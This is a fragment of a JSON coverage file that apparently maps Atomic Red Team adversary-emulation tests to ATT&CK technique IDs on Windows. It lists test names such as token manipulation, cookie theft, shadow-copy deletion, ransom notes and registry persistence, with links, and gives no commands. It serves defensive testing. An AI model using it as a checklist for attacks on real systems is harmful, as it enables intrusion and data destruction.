Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm 
Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic 
Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- 
ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive 
invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - 
Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software 
Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage 
Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet 
New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies 
(Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
